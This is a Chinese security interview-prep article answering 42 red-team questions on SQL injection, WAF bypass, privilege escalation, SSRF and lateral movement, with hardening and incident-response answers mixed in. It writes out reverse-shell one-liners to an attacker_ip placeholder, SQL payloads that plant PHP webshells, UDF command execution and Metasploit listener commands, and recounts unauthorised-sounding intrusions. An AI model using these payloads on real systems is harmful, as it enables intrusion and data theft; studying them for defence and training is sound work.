安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 02

1. 有趣的挖洞经历

2. 高频漏洞及修复方案

3. PHP/Java反序列化漏洞

4. 服务器入侵应急响应流程

5. 常用渗透工具及特点

6. WAF绕过案例(SQL注入)

7. SQL注入检测方法

8. SQL注入全解析

9. 无错误回显原因

10. 宽字符注入原理

11. CRLF注入原理

12. MySQL 5.0注入差异

13. php.ini 安全特性

14. %00截断原理

15. Webshell检测方法

16. PHP LFI漏洞原理

17. 中间件解析漏洞

18. MySQL用户密码存储

19. Windows、Linux、数据库的加固降权思路(任选其一)

20. 判断系统是否存在后门的工具

21. 绕过CDN获取目标网站真实IP的思路

22. 网站渗透测试思路(授权前提下)

23. Windows与Linux系统提权思路

Windows提权:

Linux提权:

24. 开源组件高危漏洞(10个以上)

25. 反弹Shell命令及常用类型

26. CMD查询远程终端开放端口

27. IIS+PHP+MySQL渗透思路(root注入漏洞)

28. MySQL查询表列名语句

29. UDF提权

30. SQL头注入点

31. PHP命令执行函数

32. SSRF漏洞:成因、防御、绕过

33. MySQL写Shell的几种方法

34. Metasploit打开反向监听的命令

35. 反向代理工具

36. 曲折的渗透经历

37. 查找域控方法

38. PHP弱类型底层判断原理

39. ARP攻击原理及防御

40. 渗透大企业 vs 小站点

41. 内网反弹Shell流量隐蔽方法

42. 非TCP/IP协议内网数据外传

 2025年HW(护网面试) 02

1、介绍一下自认为有趣的挖洞经历
2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案?
3、php/java反序列化漏洞的原理?解决方案?
4、如果一台服务器被入侵后,你会如何做应急响应
5、你平时使用哪些工具?以及对应工具的特点?
6、遇到waf如何进行sql注入/上传Webshell?请写出曾经绕过WAF的经过(SQLi,XSS,上传漏洞选一)
7、如何判断sql注入,有哪些方法
8、介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?
9、为什么有的时候没有错误回显
10、宽字符注入的原理?如何利用宽字符注入漏洞,payload如何构造
11、CRLF注入的原
12、mysql的网站注入,5.0以上和5.0以下有什么区别?
13、php.ini可以设置哪些安全特性
14、php的%00截断的原理是什么?
15、webshell检测,有哪些方法
16、php的LFI,本地包含漏洞原理是什么?
17、说说常见的中间件解析漏洞利用方式
18、mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?
19、Windows、Linux、数据库的加固降权思路,任选其一
20、你使用什么工具来判断系统是否存在后门
21、如何绕过CDN获取目标网站真实IP,谈谈你的思路?
22、如果给你一个网站,你的渗透测试思路是什么? 在获取书面授权的前提下。
23、谈一谈Windows系统与Linux系统提权的思路?
24、列举出您所知道的所有开源组件高危漏洞(十个以上)
25、反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么?
26、CMD命令行如何查询远程终端开放端口
27、服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路
28、请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句
29、udf提权 
30、SQL头注入点
31、php中命令执行涉及到的函数
32.、SSRF漏洞的成因 防御 绕过
33、mysql写shell有几种方法
34、Metasploit 打开反向监听的命令
35、有哪些反向代理的工具?
36、有什么比较曲折的渗透经历
37、怎么查找域控 
38、PHP 作为弱类型语言,在底层它是怎么判断变量的类型的 
39、ARP 攻击的原理(讲出具体的流程),如何发现并防御 ARP 攻击 
40、渗透大企业简单还是小站点简单,为什么 
41、内网如何反弹 shell,反弹的 shell 流量如何隐蔽 
42、除了 TCPIP 协议,如何将内网数据传递出来(内网环境有着严格防御与审查)

1. 有趣的挖洞经历

目标:某在线教育平台的课程兑换码系统
漏洞:逻辑漏洞(兑换码无限生成)
过程

  • 发现兑换码生成接口未验证权限,普通用户可调用生成接口;
  • 通过Burp重放请求,发现响应中直接返回有效兑换码;
  • 构造批量脚本生成数万个兑换码,导致平台损失数万元;
    修复方案
  1. 接口添加权限校验(如JWT鉴权);
  2. 限制单用户生成频率(如每分钟1次);
  3. 兑换码使用后立即失效。

2. 高频漏洞及修复方案

漏洞类型原理修复方案
SQL注入用户输入拼接SQL导致命令执行预编译语句(MyBatis #{})
SSRF服务端发起未校验的外部请求禁用非常用协议,URL白名单
文件上传未过滤文件类型和内容MIME校验+文件头检测

3. PHP/Java反序列化漏洞

原理

  • PHPunserialize()触发魔术方法(如__wakeup());
  • JavaObjectInputStream反序列化触发readObject()
    解决方案
  • PHP:使用json_decode()替代;
  • Java:实现SerializationFilter校验类白名单。

4. 服务器入侵应急响应流程

  1. 隔离网络:断开网线或禁用端口;
  2. 备份取证
    • 内存镜像:dumpit.exe (Windows)/ LiME(Linux);
    • 关键日志:/var/log/auth.log 、Windows事件日志;
  3. 分析溯源
    • 查找后门:find / -name "*.php" -mtime -1
    • 排查进程:ps auxf | grep reverse_shell
  4. 恢复加固:修复漏洞、重置SSH密钥。

5. 常用渗透工具及特点

工具用途特点
Burp SuiteWeb漏洞测试插件扩展(Logger++)
Nmap端口扫描脚本引擎(NSE)
CobaltStrike内网渗透可视化C2控制

6. WAF绕过案例(SQL注入)

场景:某云WAF拦截UNION SELECT
绕过步骤

  1. 注释混淆UNION/*!88888abc*/SELECT 1,2,3
  2. 分块传输Transfer-Encoding: chunked分割Payload;
    最终Payload
sqlid=1'/*!and*/1=2 union select 1,@@version,3-- -

7. SQL注入检测方法

  1. 错误回显:输入单引号'触发数据库报错;
  2. 布尔盲注and 1=1(正常) vs and 1=2(异常);
  3. 时间盲注and sleep(5)观察响应延迟。

8. SQL注入全解析

成因:动态拼接SQL(如"SELECT * FROM users WHERE id=" + input
防范

  • 预编译(Java的PreparedStatement);
  • 输入过滤(正则过滤'--)。
    注入方式
  • Union注入、报错注入、堆叠查询;
    扩展利用
  • 读取文件:LOAD_FILE('/etc/passwd')
  • 执行命令:MySQL UDF调用系统函数。

9. 无错误回显原因

  1. 配置display_errors = Off
  2. 自定义错误页面(如PHP的error_reporting(0));
  3. 前端过滤错误信息(如JSON统一封装)。

10. 宽字符注入原理

原理:GBK编码中%bf%27被解析为縗',绕过转义(\'%5c%27);
Payload

id=%bf%27 union select 1,database(),3--+  

11. CRLF注入原理

原理:注入%0d%0a(回车换行)伪造HTTP头或日志;
利用

/login?url=test%0d%0aSet-Cookie:admin=1  

12. MySQL 5.0注入差异

特性5.0以下5.0以上
信息获取暴力猜解表名information_schema
函数权限受限支持LOAD_FILE()

13. php.ini 安全特性

inidisable_functions = system,exec,passthru # 禁用危险函数 open_basedir = /var/www/html # 限制文件访问 expose_php = Off # 隐藏PHP版本 cgi.fix_pathinfo = 0 # 防止路径解析漏洞 

14. %00截断原理

场景include($_GET['file'] . '.php')
利用file=../../etc/passwd%00(PHP<5.3自动截断);
原理:C语言中\x00为字符串终止符。


15. Webshell检测方法

  1. 静态检测:正则匹配eval(system(等函数;
  2. 动态检测:监控异常进程(如/bin/sh -i);
  3. 流量分析:识别加密Webshell的固定特征(如蚁剑流量)。

16. PHP LFI漏洞原理

原理include()require()动态包含未过滤的文件路径;
利用

?file=php://filter/convert.base64-encode/resource=index.php   

17. 中间件解析漏洞

中间件漏洞形式
IIS 6.0/shell.asp;.jpg 执行ASP代码
Apachefile.php.jpg 解析为PHP
Nginx/test.jpg/test.php 触发解析

18. MySQL用户密码存储

存储表mysql.user
加密方式

  • MySQL 5.7+:SHA256 + 盐;
  • 历史版本:SHA1(SHA1(password))

19. Windows、Linux、数据库的加固降权思路(任选其一)

选择Linux系统加固思路:

  1. 最小化安装:仅安装必要软件包,减少攻击面。
  2. 用户与权限控制
    • 创建低权限用户运行服务(如www-data运行Web服务);
    • 禁用root远程登录,使用sudo授权普通用户;
    • 设置严格的文件权限(如chmod 750 /var/www)。
  3. 防火墙配置
    • 使用iptablesfirewalld限制入站端口(仅开放SSH、HTTP/HTTPS);
    • 默认拒绝所有入站,允许特定IP访问管理端口。
  4. 服务加固
    • 禁用不必要的服务(systemctl disable vsftpd);
    • 配置SSH安全:
      bash# /etc/ssh/sshd_config PermitRootLogin no PasswordAuthentication no # 强制密钥登录
  5. 日志与监控
    • 启用auditd审计关键文件(如/etc/passwd);
    • 配置logrotate防止日志溢出。

20. 判断系统是否存在后门的工具

常用工具及特点:

  1. Rootkit检测工具
    • chkrootkit:检查常见rootkit特征;
    • rkhunter:扫描隐藏文件、异常进程等。
  2. 进程监控
    • ps auxf + netstat -antp:排查异常进程与网络连接;
    • lsof -p <PID>:查看进程打开文件。
  3. 文件完整性校验
    • AIDE(高级入侵检测环境):创建文件哈希数据库,定期比对。
  4. 内存分析
    • Volatility:针对内存镜像分析恶意进程、隐藏模块。

21. 绕过CDN获取目标网站真实IP的思路

  1. 历史DNS记录
    • 查询SecurityTrailsDNSdumpster等获取历史A记录。
  2. 子域名探测
    • 扫描未接入CDN的子域名(如test.example.com ),可能指向真实IP。
  3. 邮件服务器溯源
    • 注册网站邮箱或触发邮件(如密码重置),检查邮件头Received字段IP。
  4. SSL证书匹配
    • Censys搜索相同SSL证书的IP地址。
  5. 敏感文件泄露
    • 访问/phpinfo.php/server-status等可能暴露真实IP的文件。
  6. 全球Ping
    • 使用Cloudflare未覆盖的地区节点(如南美、非洲)进行Ping测试(工具:Ping.eu )。

22. 网站渗透测试思路(授权前提下)

  1. 信息收集
    • 域名/IP资产(Amass)、端口服务(Nmap)、目录扫描(Dirb)。
  2. 漏洞扫描
    • 自动化扫描器(Burp SuiteNessus)检测SQL注入/XSS等。
  3. 手动测试重点区域
    • 登录/支付/密码重置功能(逻辑漏洞);
    • 文件上传点(绕过黑名单);
    • API接口(未授权访问)。
  4. 权限提升与持久化
    • 利用系统/服务漏洞提权(如DirtyPipe);
    • 写入Webshell或计划任务。
  5. 报告输出
    • 清晰描述漏洞原理、复现步骤、危害及修复建议。

23. Windows与Linux系统提权思路

Windows提权
  1. 内核漏洞
    • 工具Watson检测未修复漏洞(如CVE-2021-34527打印噩梦)。
  2. 服务权限滥用
    • 查找可写服务路径(accesschk.exe + sc config修改路径)。
  3. 凭证窃取
    • 内存抓取密码(Mimikatz)、SAM数据库导出。
Linux提权
  1. SUID滥用
    • find / -perm -4000 2>/dev/null查找可执行文件(如find命令执行:find . -exec /bin/sh \;)。
  2. 定时任务
    • 检查可写的Cron脚本(/etc/cron*)。
  3. 环境变量劫持
    • PATH中插入恶意路径(如替换ls为恶意脚本)。

24. 开源组件高危漏洞(10个以上)

组件漏洞编号/名称影响
Log4jCVE-2021-44228(Log4Shell)远程代码执行(RCE)
OpenSSLCVE-2014-0160(Heartbleed)内存信息泄露
Apache StrutsCVE-2017-5638OGNL表达式RCE
SpringCVE-2022-22965远程代码执行
FastjsonCVE-2017-18349反序列化RCE
ThinkPHPCVE-2018-20062任意文件包含
DrupalCVE-2018-7600(Drupalgeddon2)远程代码执行
Redis未授权访问漏洞数据泄露/RCE
NginxCVE-2013-2028栈溢出导致RCE
GitLabCVE-2021-22205未授权RCE

25. 反弹Shell命令及常用类型

常用命令

bash# Bash bash -i >& /dev/tcp/attacker_ip/port 0>&1 # Python python -c 'import socket,os,pty;s=socket.socket();s.connect(("attacker_ip",port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 

常用Shell类型/bin/bash/bin/sh
原因

  • 交互性强(支持Tab补全、历史命令);
  • 广泛存在于Linux系统,兼容性好。

26. CMD查询远程终端开放端口

cmdnetstat -ano | findstr "ESTABLISHED" | findstr ":3389" 
  • 说明:过滤3389端口(RDP默认端口)的已建立连接。

27. IIS+PHP+MySQL渗透思路(root注入漏洞)

  1. 利用SQL注入
    • 获取数据库信息:union select user(),@@version,database()
    • 读取敏感文件:' UNION SELECT LOAD_FILE('/etc/passwd'),2,3 -- -
  2. 写入Webshell
    sqlUNION SELECT "<?php system($_GET['cmd']); ?>",2,3 INTO OUTFILE '/var/www/shell.php' 

    前提:MySQL有写权限且secure_file_priv为空。

  3. 提权
    • 利用PHP执行系统命令,上传提权工具(如LinEnum.sh );
    • 内核漏洞提权(如DirtyCow)。

28. MySQL查询表列名语句

sqlSELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='helloworld' AND TABLE_NAME='users'; 

29. UDF提权

步骤

  1. 编译恶意UDF文件(如lib_mysqludf_sys.so );
  2. 导入MySQL:
    sqlCREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.so'; 
  3. 执行命令:
    sqlSELECT sys_exec('id > /tmp/out'); 

注意:需plugin_dir写权限及MySQL版本匹配。


30. SQL头注入点

指注入点在HTTP头部字段,例如:

  • User-Agent' OR 1=1-- -
  • X-Forwarded-For127.0.0.1'; WAITFOR DELAY '0:0:5'-- -
  • Cookietoken=' UNION SELECT 1,2,3-- -

31. PHP命令执行函数

高危函数列表:

phpsystem("id"); // 执行命令并输出结果 exec("ls", $output); // 执行命令返回最后一行 passthru("cat /etc/passwd"); // 直接输出原始结果 shell_exec("whoami"); // 执行命令返回完整输出 `$_GET['cmd']`; // 反引号执行 

32. SSRF漏洞:成因、防御、绕过

成因:服务端未校验用户输入的URL(如file_get_contents($_GET['url']))。
防御

  • 禁止file://gopher://等危险协议;
  • 内网IP黑名单校验。
    绕过
  • IPv6地址:http://[::1]:80/
  • DNS重绑定:利用TTL为0的域名指向内网IP(如rbndr.us );
  • 302跳转:构造恶意跳转至127.0.0.1

33. MySQL写Shell的几种方法

  1. INTO OUTFILE
    sqlSELECT "<?php eval($_POST['cmd']);?>" INTO OUTFILE '/var/www/shell.php'; 
  2. 日志文件写入
    sqlSET global general_log_file='/var/www/shell.php'; SET global general_log=on; SELECT '<?php system($_GET["c"]);?>'; 
  3. 慢查询日志
    sqlSET GLOBAL slow_query_log_file='/var/www/shell.php'; SET GLOBAL slow_query_log=1; SELECT '<?php system($_GET["c"]);?>' FROM SLEEP(11); 

34. Metasploit打开反向监听的命令

bashmsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.10 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > run 

35. 反向代理工具

工具特点
Ngrok公有服务器中转,无需公网IP
frp高性能内网穿透,支持TCP/UDP
reGeorg专用于HTTP/Socks代理跳板
Chisel加密隧道,支持多协议

36. 曲折的渗透经历

目标:某金融机构内部系统
过程

  1. 初始入口:钓鱼邮件获取员工VPN账号;
  2. 内网扫描:发现老旧Windows Server 2008(未打补丁);
  3. 提权失败:多次内核利用失败(系统加固);
  4. 横向移动:抓取内存密码进入数据库服务器;
  5. 数据获取:利用MySQL弱口令导出百万条交易记录。
    关键点:通过SMB共享传播恶意计划任务绕过防护。

37. 查找域控方法

  1. DNS查询
    cmdnslookup -type=SRV _ldap._tcp.dc._msdcs.example.com 
  2. 命令探测
    cmdnet group "Domain Controllers" /domain # Windows 
  3. 端口扫描
    • 域控通常开放389(LDAP)、88(Kerberos)等端口。

38. PHP弱类型底层判断原理

原理

  • PHP使用zval结构体存储变量,包含值(value)和类型(type);
  • 类型转换规则(如"123abc" == 123):
    1. 字符串转为数字时从左截取到第一个非数字字符;
    2. 比较时若一方为整数,另一方字符串会被转为整数再比较。

39. ARP攻击原理及防御

原理(流程)

  1. 攻击者发送伪造ARP响应包:
    "我是192.168.1.1,我的MAC是XX:XX:XX(攻击者MAC)"  
    
  2. 网关与受害者更新ARP缓存,流量被重定向到攻击者主机。
    检测方法
  • ARP表异常(如多IP映射同MAC);
  • 工具:arpwatch监控MAC变化。
    防御
  • 静态ARP绑定(arp -s 网关IP 网关MAC);
  • 交换机端口安全(MAC绑定)。

40. 渗透大企业 vs 小站点

大企业更难

  • 原因:
    1. 安全团队专业(WAF、IDS、SOC监控);
    2. 资产分散但防护完善(漏洞修复快);
    3. 代码审计严格(SDL流程)。
      小站点更易
  • 原因:
    1. 安全投入低(默认配置、弱密码);
    2. 缺乏维护(老旧系统未更新)。

41. 内网反弹Shell流量隐蔽方法

  1. 加密通信
    • 使用HTTPS隧道(如Stunnel);
    • 工具:Metasploitreverse_https载荷。
  2. 协议伪装
    • 流量伪装成DNS、ICMP(工具:DNSCatICMP隧道)。
  3. 延时与分片
    • 设置命令执行间隔降低流量特征(如meterpreterset CommunicationTimeout)。

42. 非TCP/IP协议内网数据外传

  1. 物理介质
    • USB设备手动传递(风险高)。
  2. 隐蔽信道
    • HTTP隐蔽信道:图片隐写(steghide)、协议字段(如Cookie);
    • ICMP隐蔽信道:利用ICMP报文载荷传递数据(工具:icmpsh);
    • DNS隐蔽信道:将数据编码为DNS查询(如AAAA记录请求)。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/85765.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/85765.shtml
英文地址,请注明出处:http://en.pswp.cn/pingmian/85765.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Odoo 18进阶开发:打造专业级list,kanban视图Dashboard

&#x1f3af; 项目概述 在现代企业级应用中&#xff0c;数据可视化已成为提升用户体验的关键要素。Odoo 18 作为领先的企业资源规划系统&#xff0c;为开发者提供了强大的视图定制能力。本教程将带您深入了解如何在list&#xff08;列表&#xff09;视图和Kanban&#xff08;…

LabVIEW仪表检测

依托LabVIEW 图形化开发平台&#xff0c;集成 NI、Keysight、Fluke 等硬件&#xff0c;构建自动化仪表检测工装系统。方案覆盖从二维码识别、程序烧写、多维度校准到数据管理的全流程自动化检测&#xff0c;解决传统人工检测中效率低下&#xff08;单卡检测效率提升 62.5%&…

Java八股文——消息队列「场景篇」

什么是消息队列&#xff1f; 面试官您好&#xff0c;消息队列&#xff08;Message Queue, MQ&#xff09;&#xff0c;从本质上讲&#xff0c;是一个实现了“先进先出”&#xff08;FIFO&#xff09;队列数据结构的、专门用于在不同系统或服务之间进行可靠异步通信的中间件。 …

CTE vs 子查询:深入拆解PostgreSQL复杂SQL的隐藏性能差异

1 SQL优化的关键抉择 在PostgreSQL数据库性能优化领域&#xff0c;CTE&#xff08;公共表表达式&#xff09; 和子查询的选择往往决定了复杂SQL查询的执行效率。许多开发者习惯性地认为两者功能等价&#xff0c;但实际执行路径却存在显著差异。本文将深入剖析两者的底层机制&a…

【fargo】x264的intra refresh 1:编码

【fargo】x264的intra refresh 2:识别NAL类型、 NAL slice header 解析器大神的理论分析: H264Encoder 编码输出一帧 D:\XTRANS\thunderbolt\ayame\zhb-bifrost\player-only\echo\codec\x264\echo_h264_encoder.cppbool H264Encoder::encode

npm下载离线依赖包

项目中需要用到mermaid以来&#xff0c;使用npm安装&#xff1a; npm install mermaid 但是客户现场是离线环境&#xff0c;无法直接使用npm install mermaid安装&#xff0c;所以需要考虑下载离线依赖包&#xff0c;命令为&#xff1a; npm pack mermaid 下载后&#xff1…

【教程】不同架构(armv7l等)下载Miniconda安装包

转载请注明出处&#xff1a;小锋学长生活大爆炸[xfxuezhagn.cn] 如果本文帮助到了你&#xff0c;欢迎[点赞、收藏、关注]哦~ 目录 armv7l架构 aarch、arm、x86架构 armv7l架构 wget http://repo.continuum.io/miniconda/Miniconda3-latest-Linux-armv7l.sh bash Miniconda3-…

【C++特殊工具与技术】嵌套类

在 C 中&#xff0c;类的嵌套&#xff08;Nested Class&#xff09;是一种强大的封装手段。通过将一个类定义在另一个类&#xff08;称为外围类&#xff0c;Enclosing Class&#xff09;的内部&#xff0c;我们可以将关联紧密的功能逻辑集中管理&#xff0c;同时限制嵌套类的作…

Python安装cartopy报错,解决cartopy环境配置问题

1、尝试过各种办法&#xff0c;说依赖包的问题&#xff0c;下载了没用&#xff0c;说版本问题没用。conda安装成功了&#xff0c;运行仍然报错。采用了一个笨办法解决&#xff08;高效便捷&#xff09;。 用 conda-forge 重建环境&#xff0c;因为依赖混乱&#xff0c;重新创建…

python实战项目77:足球运动员数据分析

python实战项目77:足球运动员数据分析 一、数据集介绍二、加载数据集三、查看数据3.1 查看数据大小3.2 查看数据前几行3.3 查看数据基本信息四、数据预处理4.1 查看并处理缺失值4.2 查看并处理重复值五、运动员身高和体重分布5.1 查看身高和体重列数据情况5.2 数据类型转换5.3…

安卓官方版fat-aar:使用Fused Library将多个Android库发布为一个库

安卓官方版fat-aar:使用Fused Library将多个Android库发布为一个库 - Wesley’s Blog 在开发 sdk 时&#xff0c;内部一般会划分好几个模块。但当需要打包成一个模块发布时&#xff0c;往往需要依赖第三方插件。比如著名的 fat-aar&#xff1a;https://github.com/kezong/fat-…

VR看房:重塑房地产行业生态的技术革命

在科技浪潮的席卷下&#xff0c;虚拟现实&#xff08;VR&#xff09;技术正深刻重塑房地产行业格局。VR看房这一创新模式的兴起&#xff0c;打破了传统看房的诸多限制&#xff0c;从根本上变革了购房者的看房体验&#xff0c;也为房地产企业的运营带来全新契机与挑战。 一、VR…

vscode+react+ESLint解决不引入组件,vscode不会报错的问题

解决不引入组件&#xff0c;vscode不会报错的问题 routes.jsx 全部代码如下 export const routes [{path:"/",element:<Home/>} ]在项目根目录下新建个 eslint.config.js 加入下面的代码&#xff0c;要保证node_modules里安装了 eslint-plugin-react&a…

Android制作AAR包并混淆后加载调用

为将部分算法代码封装为AAR包供其他项目调用&#xff0c;我基于零经验的情况搭建了一个Demo进行功能验证&#xff0c;在此记录流程以备后续参考。 1、新建一个Android Project&#xff0c;选择No Activity 2、创建 MyClasses 类用于封装相关代码 3、创建taar包并在其中定义MyAl…

常见应用层协议介绍

在计算机网络中,应用层协议是 OSI 模型中的最高层,负责为用户提供直接的网络服务。 一、基于TCP的协议 应用层协议端口号基于的传输层协议关键特性HTTP80TCP无状态、明文传输HTTPS443TCP (TLS加密)HTTP+SSL/TLS加密FTP20(数据)/21(控制)TCP双通道传输、支持认证SSH22TCP加密替…

分享两个可以一键生成sql server数据库 html格式巡检报告的脚本

方法一&#xff1a;使用sqlcmd C:\>sqlcmd -S LAPTOP-25D4U18P -i C:\sqlserver_check_html.sql -o C:\check\report.html -h-1 -f 65001sqlserver_check_html.sql代码如下&#xff1a; SET NOCOUNT ON; -- 修复错误的关键设置 SET QUOTED_IDENTIFIER ON; SET ANSI_NULLS…

AI Gateway 介绍

AI 网关和传统的 API 网关 API 网关发展 在最开始的时候&#xff0c;互联网通过电话线连接上网&#xff0c;通过“调制解调器&#xff08;Modem&#xff09;”将计算机信号和电话线信号“调制”与“调解”以实现上网功能。当今时代大多使用宽带上网&#xff0c;拨号上网已被逐…

15.3 LLaMA 3+LangChain实战:智能点餐Agent多轮对话设计落地,订单准确率提升90%!

LLaMA 3LangChain实战&#xff1a;智能点餐Agent多轮对话设计落地&#xff0c;订单准确率提升90%&#xff01; 关键词&#xff1a;多轮对话设计、场景化提示工程、LLaMA 3 微调、LangChain Agent、饭店点餐场景建模 饭店点餐场景的 Agent 方案设计 通过分层架构实现复杂场景对…

EXPLAIN优化 SQL示例

以下通过 6 个真实案例展示如何使用 EXPLAIN 优化 SQL&#xff0c;每个案例包含问题 SQL、EXPLAIN 分析、优化方案和优化后效果对比&#xff1a; 案例 1&#xff1a;全表扫描优化 (typeALL) 问题 SQL&#xff08;用户订单查询&#xff09;&#xff1a; SELECT * FROM orders …

「Linux文件及目录管理」通配符与文件名

「Linux文件及目录管理」通配符与文件名 知识点解析 通配符是Linux中用于匹配文件名的特殊字符,能高效处理批量文件操作。 常见通配符包括: *:匹配任意字符序列(包括空字符)touch a b ab a123 # 创建测试文件 ls a* # 匹配a, ab, a123?:精确匹配单个字符…